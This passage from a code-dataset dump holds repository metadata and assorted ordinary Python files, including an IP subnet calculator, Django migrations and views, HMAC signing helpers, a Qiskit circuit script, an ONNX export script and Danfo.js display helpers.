self.text_browser.append("Control Modifier")
if event.modifiers()&QtCore.Qt.AltModifier:
#Alt/Option key on a Mac. An EMAN convention is that Alt+Left click works like a middle click.
self.text_browser.append("Alt Modifier")
if event.modifiers()&QtCore.Qt.MetaModifier:
#Control Key on a Mac. A Mac convention is that Ctrl+Left Click works like a right click.
self.text_browser.append("Meta Modifier")
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
window = MouseAndKeyModifiers()
window.show()
sys.exit(app.exec_())
|
[
"[email protected]"
] | |
b8e8df4165e5c68d730eab8b8fe69f808f78ca32
|
bc08302533982d4a154f5615a2c8366f695234e5
|
/work/tools/free_ip.py
|
721bcc9f76e13c7c646d22000c17c96dd1e0352c
|
[] |
no_license
|
rvfedorin/PythonDevelopment
|
bfd3cfb4ad22d72e2002d7430fa8821ea35717f6
|
d6748189874b53b8357d5b3ff7d520ff0a93e15a
|
refs/heads/master
| 2022-12-13T11:53:16.041737 | 2019-02-15T08:50:15 | 2019-02-15T08:50:15 | 122,050,190 | 0 | 0 | null | 2022-12-08T01:18:43 | 2018-02-19T10:57:37 |
Python
|
UTF-8
|
Python
| false | false | 3,528 |
py
|
def mark_used_ip(list_used_ip, list_all_ip):
for ip in list_all_ip:
if ip in list_used_ip:
position_ip = list_all_ip.index(ip)
list_all_ip[position_ip] = 'x'
def get_free_lan(list_ip_with_used):
free_lan = []
for lan in range(25, 33):
count_subnet = 2**(lan - 24)
count_ip_in_subnet = 2**(32 - lan)
start_ip = 0
end_ip = count_ip_in_subnet
for subnet in range(count_subnet):
if len(list_ip_with_used) >= end_ip and 'x' not in list_ip_with_used[start_ip:end_ip]:
free_lan.append(f'{list_ip_with_used[start_ip]}/{lan}')
all_ip_temp = [_ for _ in list_ip_with_used if _ not in list_ip_with_used[start_ip:end_ip]]
list_ip_with_used = all_ip_temp[:]
else:
start_ip += count_ip_in_subnet
end_ip += count_ip_in_subnet
if len(list_ip_with_used) == 0:
break
if len(list_ip_with_used) == 0:
break
return free_lan
def get_only_fourth_octet(list_ip):
list_octets = []
for i in list_ip:
octet = i.split('.')
list_octets.append(int(octet[3]))
lan = f'{octet[0]}.{octet[1]}.{octet[2]}.'
return list_octets, lan
def get_all_ip_in_lan(list_lan):
ip_of_all_lan = []
for lan in list_lan:
mask_lan = lan.split('/')
lan_ip = mask_lan[0].split('.')
for i in range(2**(32-int(mask_lan[1]))):
four_octet = int(lan_ip[3])+i
ip_of_all_lan.append(f'{lan_ip[0]}.{lan_ip[1]}.{lan_ip[2]}.{four_octet}')
return ip_of_all_lan
if __name__ == '__main__':
all_ip = []
for i in range(256):
all_ip.append(i)
x = (get_all_ip_in_lan(['172.30.86.164/30', '172.30.86.216/30', '172.30.86.152/30', '172.30.86.156/30',
'172.30.86.160/30', '172.30.86.144/30', '172.30.86.140/30', '172.30.86.136/30',
'172.30.86.120/30', '172.30.86.116/30', '172.30.86.88/30', '172.30.86.92/30',
'172.30.86.96/30', '172.30.86.80/30', '172.30.86.20/30', '172.30.86.184/30',
'172.30.86.196/30', '172.30.86.212/30', '172.30.86.220/30', '172.30.86.224/30',
'172.30.86.232/30', '172.30.86.236/30', '172.30.86.240/30', '172.30.86.248/30',
'172.30.86.252/30', '172.30.86.132/30', '172.30.86.44/30', '172.30.86.148/30',
'172.30.86.76/30', '172.30.86.48/30', '172.30.86.40/30', '172.30.86.84/30',
'172.30.86.36/30', '172.30.86.72/30', '172.30.86.104/30', '172.30.86.108/30',
'172.30.86.24/30', '172.30.86.228/30', '172.30.86.204/30', '172.30.86.0/30',
'172.30.86.4/30', '172.30.86.8/30', '172.30.86.12/30', '172.30.86.244/30',
'172.30.86.192/30', '172.30.86.124/30', '172.30.86.112/30', '172.30.86.60/30',
'172.30.86.208/30', '172.30.86.176/30', '172.30.86.68/30', '172.30.86.28/30',
'172.30.86.32/30', '172.30.86.56/30', '172.30.86.100/30', '172.30.86.168/29',
'172.30.86.200/30', '172.30.86.188/30', '172.30.86.180/30']))
list_used_ip = x
list_used_ip_octet, lan24 = get_only_fourth_octet(list_used_ip)
mark_used_ip(list_used_ip_octet, all_ip)
free = get_free_lan(all_ip)
for i in free:
print(f'{lan24}{i}')
|
[
"[email protected]"
] | |
1c95e6322f01f2981b14f4584444c325432b8207
|
490ffe1023a601760ae7288e86723f0c6e366bba
|
/kolla-docker/patching/zun_compute_api/providerregion.py
|
4dc91fc51a266902d9ef25f4c4c4b88fc506ef8c
|
[] |
no_license
|
bopopescu/Cloud-User-Management
|
89696a5ea5d2f95191327fbeab6c3e400bbfb2b8
|
390988bf4915a276c7bf8d96b62c3051c17d9e6e
|
refs/heads/master
| 2022-11-19T10:09:36.662906 | 2018-11-07T20:28:31 | 2018-11-07T20:28:31 | 281,786,345 | 0 | 0 | null | 2020-07-22T21:26:07 | 2020-07-22T21:26:06 | null |
UTF-8
|
Python
| false | false | 1,658 |
py
|
def providerregion_update(self, context, container, *args):
if direct_action:
return self.manager.providerregion_update(context, container, *args)
else:
return self.rpcapi.providerregion_update(context, container, *args)
def providerregion_show(self, context, container, *args):
if direct_action:
return self.manager.providerregion_show(context, container)
else:
return self.rpcapi.providerregion_show(context, container)
def providerregion_create(self, context, new_providerregion, extra_spec,
requested_networks):
host_state = None
try:
host_state = {} # self._schedule_container(context, new_providerregion, extra_spec)
except Exception as exc:
# new_providerregion.status = consts.ERROR
# new_providerregion.status_reason = str(exc)
# new_providerregion.save(context)
return
if direct_action:
self.manager.providerregion_create(context, "", requested_networks, new_providerregion)
else:
self.rpcapi.providerregion_create(context, "", new_providerregion, "", requested_networks)
# self.rpcapi.providerregion_create(context, host_state['host'],
# new_providerregion, host_state['limits'],
# requested_networks)
def providerregion_delete(self, context, container, *args):
return self.manager.providerregion_delete(context, container, True)
# return self.rpcapi.providerregion_delete(context, container, *args)
|
[
"[email protected]"
] | |
ea468b999d209aa5949f47fbf2a33213a78b306b
|
4369c5a214f8c4fb1f8a286f72d57cfa9c3f02c7
|
/geotrek/maintenance/migrations/0010_auto_20200228_1755.py
|
dfa45158e5acc1cee91f1e527738011a5ef40379
|
[
"BSD-2-Clause"
] |
permissive
|
GeotrekCE/Geotrek-admin
|
c13d251066e92359c26f22d185b8bd2e26e622ef
|
a91b75261a876be51ad2a693618629900bea6003
|
refs/heads/master
| 2023-08-21T12:45:25.586551 | 2023-08-09T12:28:33 | 2023-08-09T12:28:33 | 9,886,107 | 71 | 56 |
BSD-2-Clause
| 2023-09-13T09:40:33 | 2013-05-06T12:17:21 |
Python
|
UTF-8
|
Python
| false | false | 1,121 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2020-02-28 16:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('maintenance', '0009_auto_20200211_1011'),
]
operations = [
migrations.AlterField(
model_name='intervention',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name='Insertion date'),
),
migrations.AlterField(
model_name='intervention',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AlterField(
model_name='project',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name='Insertion date'),
),
migrations.AlterField(
model_name='project',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
]
|
[
"[email protected]"
] | |
a67fd9139f1b1a1a5f55555ccfc4ea911006371a
|
f1e98def25f88d17c328c07d4052cd6c34c27707
|
/app/accounts/migrations/0002_alter_account_is_active.py
|
c7dd55e323cc76df4802b6c243d6f44f3d2b3d94
|
[
"MIT"
] |
permissive
|
iyanuashiri/exchange-api
|
c7f1fd2257c3369de9c0b7bea6806c602f25662e
|
86f7a4e9fb17f71888e6854510618876d1010c19
|
refs/heads/main
| 2023-05-30T22:57:46.901693 | 2021-06-13T21:59:22 | 2021-06-13T21:59:22 | 376,542,066 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 520 |
py
|
# Generated by Django 3.2.4 on 2021-06-13 17:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='account',
name='is_active',
field=models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active'),
),
]
|
[
"[email protected]"
] | |
34b10e72f10087aaa703323b4c4bb1e1fefdc4d2
|
5b7d5723b84f5011965aba18ebf0c080253b2fcb
|
/posts/views/feed.py
|
607dc5b67c34d133f749e9e5c0c63d56c801c80a
|
[
"MIT"
] |
permissive
|
ReDetection/vas3k.club
|
5980e6849ccf2e67a380d80d23036ec09ed94453
|
ad97fefca5ec52047b2daad77ddf2eb2aecb03b3
|
refs/heads/master
| 2023-06-11T19:48:56.730541 | 2020-08-12T17:44:26 | 2020-08-12T17:44:26 | 287,545,618 | 0 | 0 |
MIT
| 2020-08-14T13:58:31 | 2020-08-14T13:58:30 | null |
UTF-8
|
Python
| false | false | 2,905 |
py
|
from datetime import datetime, timedelta
from django.db.models import Q
from django.http import Http404
from django.shortcuts import get_object_or_404, render
from auth.helpers import auth_required
from common.pagination import paginate
from posts.models import Post, Topic
POST_TYPE_ALL = "all"
ORDERING_ACTIVITY = "activity"
ORDERING_NEW = "new"
ORDERING_TOP = "top"
ORDERING_TOP_WEEK = "top_week"
ORDERING_TOP_MONTH = "top_month"
@auth_required
def feed(request, post_type=POST_TYPE_ALL, topic_slug=None, ordering=ORDERING_ACTIVITY):
post_type = post_type or Post
if request.me:
request.me.update_last_activity()
posts = Post.objects_for_user(request.me)
else:
posts = Post.visible_objects()
# filter posts by type
if post_type != POST_TYPE_ALL:
posts = posts.filter(type=post_type)
# filter by topic
topic = None
if topic_slug:
topic = get_object_or_404(Topic, slug=topic_slug)
posts = posts.filter(topic=topic)
# hide non-public posts and intros from unauthorized users
if not request.me:
posts = posts.exclude(is_public=False).exclude(type=Post.TYPE_INTRO)
# exclude shadow banned posts, but show them in "new" tab
if ordering != ORDERING_NEW:
if request.me:
posts = posts.exclude(Q(is_shadow_banned=True) & ~Q(author_id=request.me.id))
else:
posts = posts.exclude(is_shadow_banned=True)
# no type and topic? probably it's the main page, let's apply some more filters
if not topic and post_type == POST_TYPE_ALL:
posts = posts.filter(is_visible_on_main_page=True)
# order posts by some metric
if ordering:
if ordering == ORDERING_ACTIVITY:
posts = posts.order_by("-last_activity_at")
elif ordering == ORDERING_NEW:
posts = posts.order_by("-published_at", "-created_at")
elif ordering == ORDERING_TOP:
posts = posts.order_by("-upvotes")
elif ordering == ORDERING_TOP_WEEK:
posts = posts.filter(
published_at__gte=datetime.utcnow() - timedelta(days=7)
).order_by("-upvotes")
elif ordering == ORDERING_TOP_MONTH:
posts = posts.filter(
published_at__gte=datetime.utcnow() - timedelta(days=31)
).order_by("-upvotes")
else:
raise Http404()
# split results into pinned and unpinned posts on main page
pinned_posts = []
if ordering == ORDERING_ACTIVITY:
pinned_posts = posts.filter(is_pinned_until__gte=datetime.utcnow())
posts = posts.exclude(id__in=[p.id for p in pinned_posts])
return render(request, "posts/feed.html", {
"post_type": post_type or POST_TYPE_ALL,
"ordering": ordering,
"topic": topic,
"posts": paginate(request, posts),
"pinned_posts": pinned_posts,
})
|
[
"[email protected]"
] | |
5c3b9ce4daac002df7317fca1d9da2026544660a
|
82205ef1622ef3bb3bd4982f6ddc52509686af8c
|
/numba2/pipeline.py
|
6a3813352da9a461afdad7bd801f5f684e75bdd7
|
[] |
no_license
|
cooperliu101/numba-lang
|
22f1567e17cd7cf831f254bf64bc7e3192c973c3
|
37abfcbb516175153e73474dababb2d89cba7a8b
|
refs/heads/master
| 2021-07-21T14:35:23.943243 | 2013-11-15T12:07:53 | 2013-11-15T12:07:53 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,460 |
py
|
# -*- coding: utf-8 -*-
"""
Pipeline that determines phase ordering and execution.
"""
from __future__ import print_function, division, absolute_import
import dis
import types
import pykit.ir
#===------------------------------------------------------------------===
# Pipeline
#===------------------------------------------------------------------===
def run_pipeline(func, env, passes):
"""
Run a sequence of transforms (given as functions or modules) on the
AIR function.
"""
env['numba.state.crnt_func'] = func
for transform in passes:
func, env = apply_transform(transform, func, env)
env['numba.state.crnt_func'] = func
return func, env
def apply_transform(transform, func, env):
if isinstance(transform, types.ModuleType):
result = transform.run(func, env)
else:
result = transform(func, env)
result = _check_transform_result(transform, func, env, result)
return result or (func, env)
def _check_transform_result(transform, func, env, result):
if result is not None and not isinstance(result, tuple):
if isinstance(result, pykit.ir.Function):
return result, env
if isinstance(transform, types.ModuleType):
transform = transform.run
transform = transform.__module__ + '.' + transform.__name__
raise ValueError(
"Expected (func, env) result in %r, got %s" % (transform, result))
return result
|
[
"[email protected]"
] | |
f3e7ef114ef2471fbf5671381769253a62f14fce
|
f693c9c487d31a677f009afcdf922b4e7f7d1af0
|
/biomixer-venv/bin/rst2latex.py
|
f2bf88ab2545f14b13e630bbf6232fa0aac977a0
|
[
"MIT"
] |
permissive
|
Shellowb/BioMixer
|
9048b6c07fa30b83c87402284f0cebd11a58e772
|
1939261589fe8d6584a942a99f0308e898a28c1c
|
refs/heads/master
| 2022-10-05T08:16:11.236866 | 2021-06-29T17:20:45 | 2021-06-29T17:20:45 | 164,722,008 | 1 | 3 |
MIT
| 2022-09-30T20:23:34 | 2019-01-08T19:52:12 |
Python
|
UTF-8
|
Python
| false | false | 831 |
py
|
#!/home/shello/Documents/BioMixer/biomixer-venv/bin/python
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates LaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='latex', description=description)
|
[
"[email protected]"
] | |
5114e9fb9e89b7c121fe36ba7adffd2c63ca57fb
|
1f5299e547125f7ba2c3b72984e82ba3b1f984de
|
/basejumper/security.py
|
ad0e4a6b627153a5f150932198651845b40573cd
|
[] |
no_license
|
ESGF/basejump
|
72b805818188ae09b1e3329035718b0816927a13
|
593d5e57e63848c30219ca9b49e25f49b59dcf82
|
refs/heads/master
| 2021-07-23T04:19:57.489628 | 2017-11-02T16:51:52 | 2017-11-02T16:51:52 | 47,994,570 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 908 |
py
|
import hmac
import hashlib
import json
import collections
def constant_time_compare(val1, val2):
# We'll allow them to know that the lengths of the strings don't match
if len(val1) != len(val2):
return False
result = 0
for x, y in zip(val1, val2):
result |= ord(x) ^ ord(y)
return result == 0
def hmac_compare(key, msg, known):
h = hmac.new(key, msg, hashlib.sha256)
return constant_time_compare(h.hexdigest(), known)
def get_dict_signature(dictionary, key):
h = hmac.new(key, digestmod=hashlib.sha256)
for k in sorted(dictionary.keys()):
h.update(k)
h.update(str(dictionary[k]))
return h.hexdigest()
def check_json_sig(dictionary, key, signature):
return constant_time_compare(get_dict_signature(dictionary, key), signature)
def sign_path(path, key):
h = hmac.new(key, path, hashlib.sha256)
return h.hexdigest()
|
[
"[email protected]"
] | |
c433ae0599808eb1ea13010018c8a7e094198719
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/63/usersdata/189/29190/submittedfiles/swamee.py
|
3b19ef457ff49af07dc44e820878bdc4c334e957
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 414 |
py
|
# -*- coding: utf-8 -*-
import math
f= float(input('digite f:'))
l= float(input('digite l:'))
q= float(input('digite q:'))
delta= float(input('digite delta:'))
v= float(input('digite v:'))
d=(8*f*l*(q*q)/3.14159**2*9.81*delta)/(1/5)
rey=((4*q)/(3.14159*d*v))
k=0.25/(math.log10(0.000002/3.7*d+5.74/rey**0.9))**2
print('O valor de D é %.4f' %d)
print('O valor de Rey é %.4f' %rey)
print('O valor de K é %.4f' %k)
|
[
"[email protected]"
] | |
8bafb18de3c09b4e845ad8d2df44676d5617bfad
|
3e3743928f43aaef5cfb72e257b6f091fc2a39cb
|
/src/whirlwind/tornado/carbon/persist.py
|
6a4360ba75d08129ad746ac60e9c350f75c12a51
|
[
"Apache-2.0"
] |
permissive
|
bearstech/whirlwind-tornado
|
3871862944f584816a1d90891cec815f64209e14
|
85b9e6b4b3413694cb6e5040ce5c72b6e5e436ac
|
refs/heads/master
| 2021-01-18T14:10:05.666763 | 2020-10-13T09:47:05 | 2020-10-13T09:47:05 | 10,527,838 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,992 |
py
|
import time
import struct
import os.path
import os
import whisper
from redis import StrictRedis as Redis
from whirlwind import target_to_path
METRICS = 'metrics'
PERIOD = 30
METRIC_WRITE = 'carbon.write'
METRIC_POINTS = 'carbon.points'
class Persist(object):
""" Sequential writer for Carbon server.
The story is simple, fetch data from redis, write them, wait, loop.
This code is supervised by Carbon daemon.
"""
def __init__(self, path="/tmp/"):
self.redis = Redis()
self.path = path
self.dirs = set()
self.redis.sadd(METRICS, METRIC_POINTS, METRIC_WRITE)
def metric(self, name, value):
"Add some metrics : make your own dogfood, just before lunch."
timestamp = time.time()
serialized = struct.pack('!ff', timestamp, value)
pipe = self.redis.pipeline()
pipe.zadd(name, timestamp, serialized)
pipe.publish(name, serialized)
pipe.execute()
def run(self):
while True:
before = time.time()
self.handle()
after = time.time()
self.metric(METRIC_WRITE, (after - before) * 1000)
time.sleep(PERIOD - int(before) + int(after))
def handle(self):
points = 0
for metric in self.redis.smembers(METRICS):
values = self.redis.zrange(metric, 0, -1)
points += len(values)
f = target_to_path(self.path, metric)
d = os.path.dirname(f)
if d not in self.dirs:
if not os.path.isdir(d):
os.makedirs(d)
self.dirs.add(d)
if not os.path.exists(f):
whisper.create(f, [(10, 1000)]) # [FIXME] hardcoded values
whisper.update_many(f, [struct.unpack('!ff', a) for a in values])
if len(values):
self.redis.zrem(metric, *values)
self.metric(METRIC_POINTS, points)
if __name__ == "__main__":
p = Persist()
p.run()
|
[
"[email protected]"
] | |
dc49aee3b646e4e2864be55fd34519a351e9c3ad
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/data/p4VQE/R1/benchmark/startQiskit_noisy83.py
|
997aaa1938fcb497d01eab2eff9be00509126ac8
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,391 |
py
|
# qubit number=3
# total number=9
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.swap(input_qubit[1],input_qubit[0]) # number=5
prog.swap(input_qubit[1],input_qubit[0]) # number=6
prog.y(input_qubit[2]) # number=7
prog.y(input_qubit[2]) # number=8
# circuit end
return prog
if __name__ == '__main__':
n = 4
V = np.arange(0, n, 1)
E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]
G = nx.Graph()
G.add_nodes_from(V)
G.add_weighted_edges_from(E)
step_size = 0.1
a_gamma = np.arange(0, np.pi, step_size)
a_beta = np.arange(0, np.pi, step_size)
a_gamma, a_beta = np.meshgrid(a_gamma, a_beta)
F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2 - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (
1 + np.cos(4 * a_gamma) ** 2)
result = np.where(F1 == np.amax(F1))
a = list(zip(result[0], result[1]))[0]
gamma = a[0] * step_size
beta = a[1] * step_size
prog = make_circuit(4)
sample_shot =5200
writefile = open("../data/startQiskit_noisy83.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
backend = FakeYorktown()
circuit1 = transpile(prog, FakeYorktown())
circuit1.measure_all()
prog = circuit1
info = execute(prog,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
|
[
"[email protected]"
] | |
e680ac98db693298f1bdeb9376fa11577feeb89a
|
c237e2f29eac2b92bd2b77d055e33cf760960284
|
/todobackend/todo/serializers.py
|
dc073eafa9c9e17d9bdc60cc128b53a776392e7b
|
[] |
no_license
|
razyesh/Django-TODO-React
|
7f3293c858099f8656a287c8706f739b1d513077
|
b8529138334710d582324f286c10a39197aca25d
|
refs/heads/master
| 2022-12-11T11:20:33.622468 | 2019-06-28T10:28:03 | 2019-06-28T10:28:03 | 194,255,236 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 272 |
py
|
from rest_framework import serializers
from .models import Todo
class TodoSerializer(serializers.ModelSerializer):
class Meta:
model = Todo
fields = (
'id',
'title',
'description',
'completed',
)
|
[
"[email protected]"
] | |
25c3b42a397977592ebd6616aeefe441954c721c
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/built-in/cv/classification/3D_ResNet_ID0421_for_PyTorch/pth2onnx.py
|
344f0acb80d30eeb817bac80202a259a4e4fbed2
|
[
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 |
Apache-2.0
| 2022-10-15T09:29:12 | 2022-04-20T04:11:18 |
Python
|
UTF-8
|
Python
| false | false | 2,739 |
py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
import json
import random
import os
import numpy as np
import torch
from opts import parse_opts
from model import (generate_model, load_pretrained_model, make_data_parallel,
get_fine_tuning_parameters)
def json_serial(obj):
if isinstance(obj, Path):
return str(obj)
def get_opt():
opt = parse_opts()
if opt.root_path is not None:
opt.video_path = opt.root_path / opt.video_path
opt.annotation_path = opt.root_path / opt.annotation_path
opt.result_path = opt.root_path / opt.result_path
if opt.resume_path is not None:
opt.resume_path = opt.root_path / opt.resume_path
opt.arch = '{}-{}'.format(opt.model, opt.model_depth)
opt.begin_epoch = 1
opt.n_input_channels = 3
print(opt)
with (opt.result_path / 'opts.json').open('w') as opt_file:
json.dump(vars(opt), opt_file, default=json_serial)
return opt
def resume_model(resume_path, arch, model):
print('loading checkpoint {} model'.format(resume_path))
checkpoint = torch.load(resume_path, map_location='cpu')
assert arch == checkpoint['arch']
if hasattr(model, 'module'):
model.module.load_state_dict(checkpoint['state_dict'])
else:
model.load_state_dict(checkpoint['state_dict'])
return model
def main_worker(index, opt):
random.seed(opt.manual_seed)
np.random.seed(opt.manual_seed)
torch.manual_seed(opt.manual_seed)
model = generate_model(opt)
if opt.resume_path is not None:
model = resume_model(opt.resume_path, opt.arch, model)
model = make_data_parallel(model, opt.distributed, opt.device)
dummy_input = torch.ones(10, 3, 16, 112, 112)
torch.onnx.export(
model,
dummy_input,
'3D-ResNets.onnx',
input_names=['input'],
output_names=['output'],
export_params=True,
do_constant_folding=True,
verbose=True,
opset_version=11)
print('3D-ResNets.onnx export success')
if __name__ == '__main__':
opt = get_opt()
opt.device = torch.device('cpu')
main_worker(-1, opt)
|
[
"[email protected]"
] | |
fe0b784d9423f6752a2e04ea2db13d45f4526bf0
|
7249edf3365731c92a9c9c05db3186894306cc17
|
/python/src/vmaf/svmutil.py
|
ca49e991943642c3fce7b7aca7f07566c7af3622
|
[
"LGPL-3.0-or-later",
"Apache-2.0"
] |
permissive
|
sunery/vmaf
|
22e2f782549e1c71aa6f5160f26350e0aca06189
|
03eb8a4980b1bf2b3edd66767e67927109dbd9de
|
refs/heads/master
| 2020-04-01T15:12:57.469291 | 2018-10-15T00:31:21 | 2018-10-15T00:31:21 | 153,327,009 | 1 | 0 |
Apache-2.0
| 2018-10-16T17:32:53 | 2018-10-16T17:32:53 | null |
UTF-8
|
Python
| false | false | 735 |
py
|
# TODO: dependency on libsvm/svmutil needs to be properly done, this is a temporary workaround wrapper
from __future__ import absolute_import
import sys
from vmaf.config import VmafConfig
# This will work only when running with a checked out vmaf source, but not via pip install
libsvm_path = VmafConfig.root_path('libsvm', 'python')
if libsvm_path not in sys.path:
# Inject {project}/libsvm/python to PYTHONPATH dynamically
sys.path.append(libsvm_path)
try:
# This import will work only if above injection was meaningful (ie: user has the files in the right place)
from svmutil import * # noqa
except ImportError as e:
print "Can't import svmutil from %s: %s" % (libsvm_path, e)
sys.exit(1)
|
[
"[email protected]"
] | |
a85f58e88b5664a708051c99c0c4ada535118d4e
|
70121257e52e0fd2f0895414fcee3c991737443a
|
/python_recipes/danfo_csv.py
|
96c22906850257b9b40aa400587b7180e3fa23bd
|
[] |
no_license
|
OlgaBelitskaya/cookbooks
|
2e54208bb5e5157814deea6ff71cd7ce5b1e4972
|
216dde3e5617203371ed4c4bb7d9e8391640c588
|
refs/heads/master
| 2021-07-11T15:56:44.923442 | 2021-03-25T08:38:46 | 2021-03-25T08:38:46 | 99,447,645 | 0 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,696 |
py
|
from IPython.core.display import display,HTML
def danfo_table_csv(url,columns,header_font_size):
html_str="""<html><head><meta charset='UTF-8'>"""+\
"""<meta name='viewport' """+\
"""content='width=device-width,initial-scale=1.0'>"""+\
"""<script src='https://cdn.jsdelivr.net/npm/"""+\
"""[email protected]/dist/index.min.js'></script></head>"""+\
"""<div><p> CSV =>>> Danfo DataFrames</p>"""+\
"""<div id='div015_1'></div><script>"""+\
"""var url='"""+url+"""'; """+\
"""dfd.read_csv(url)"""+\
""" .then(df=>{df.loc({columns:"""+str(columns)+\
"""}).plot('div015_1').table({header_style:"""+\
"""{font:{size:"""+str(header_font_size)+"""}}})})"""+\
""" .catch(err=>{console.log(err);})"""+\
"""</script></div></html>"""
display(HTML(html_str))
def danfo_chart_csv(url,columns,line_width,title):
html_str="""<html><head><meta charset='UTF-8'>"""+\
"""<meta name='viewport' """+\
"""content='width=device-width,initial-scale=1.0'>"""+\
"""<script src='https://cdn.jsdelivr.net/npm/"""+\
"""[email protected]/dist/index.min.js'> </script></head>"""+\
"""<body><p> CSV =>>> Danfo DataFrames</p>"""+\
"""<div id='div015_2'></div><script>"""+\
"""var url='"""+url+"""'; """+\
"""dfd.read_csv(url).then(df=>{var layout={"""+\
""" title:'"""+title+\
"""',xaxis:{title:'columns'},"""+\
""" yaxis:{title:'value'}}; """+\
""" df.plot('div015_2').line({"""+\
"""line:{width:"""+str(line_width)+"""},"""+\
"""columns:"""+str(columns)+""",layout:layout})})"""+\
""" .catch(err=>{console.log(err);})"""+\
"""</script></body></html>"""
display(HTML(html_str))
|
[
"[email protected]"
] | |
55dbe8317f1c57f0eda91ec6f4ea5d6a3355faf5
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Flickr/Places/FindByKeyword.py
|
c0620abf4ec0d8e85c197a86e1e3a6d28555d771
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,859 |
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# FindByKeyword
# Returns a list of place IDs for a query string.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FindByKeyword(Choreography):
def __init__(self, temboo_session):
"""
